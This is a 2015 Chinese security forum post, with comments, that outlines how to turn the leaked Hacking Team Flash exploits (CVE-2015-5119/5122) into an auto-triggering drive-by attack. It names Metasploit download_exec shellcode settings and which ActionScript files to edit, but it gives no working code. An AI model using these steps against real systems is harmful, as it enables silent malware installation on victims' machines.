Hacking Team flash 0day 快速利用介绍

Hacking Team flash 0day 快速利用介绍

三好学生 | 2015-07-13 09:54

0x00 目标

利用Hacking Team 的flash 0day样本（CVE-2015-5119&CVE-2015-5122），改造升级，支持downloader&exec。

0x01 测试环境

Windows 7 SP1 (64-bit)

ie8.0.7600.16385

Adobe Flash Player 18,0,0,194

0x02 样本分析

已知成功环境：

Windows 7 SP1 (32-bit) IE11 Adobe Flash 18.0.0.194

Windows 7 SP1 (32-bit) Firefox 38.0.5 Adobe Flash 18.0.0.194

Windows 8.1 (32-bit) Firefox Adobe Flash 18.0.0.194

Linux Mint "Rebecca" (32 bits) Firefox 33.0 Adobe Flash 11.2.202.468

0x03 样本测试：

swf文件，ie加载后点击Run calc.exe，弹出计算器

如图1：

0x04 简单修改

需要对样本做两处修改：

改造：实现downloader&exec

升级：swf加载后自动执行shellcode

1. 生成shellcode

use windows/download_exec

set exe

set URL

generate -t dword

2.生成swf

开发环境：Adobe Flash CS6

（1）替换shellcode

ShellWin32.as和ShellWin64.as文件中Vector.<uint>内容改为shellcode

（2）实现自动触发

修改MyClass.as文件

（3）编译

---

仅作测试，不许抄作业，后果自负

[原文地址]

各种吐槽：

1#

浮萍 | 2015-07-13 09:55

图呢

2#

三好学生 | 2015-07-13 09:56

@浮萍 我先学习一下zone怎么用~

3#

蒙塔基的钢弹 (放下面子，求真学习，拾起斗志，用心渗透！) | 2015-07-13 11:03

@三好学生 私信QQ了，可否即时交流下？

4#

三好学生 | 2015-07-13 11:25

@蒙塔基的钢弹 你骗我，我怎么没有发现私信

5#

0x02 | 2015-07-13 11:58

@三好学生 这个是还没写完？前排坐等

6#

Sunshie (http://phpinfo.me欢迎友链) | 2015-07-13 12:06

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb

7#

三好学生 | 2015-07-13 12:14

@0x02 已经无法再编辑，我该怎么办

8#

DM_ (http://x0day.me) | 2015-07-13 12:16

zone里有markdown就好了

9#

三好学生 | 2015-07-13 12:27

其余内容已被DM_和谐，与本人无关

留言评论（旧系统）：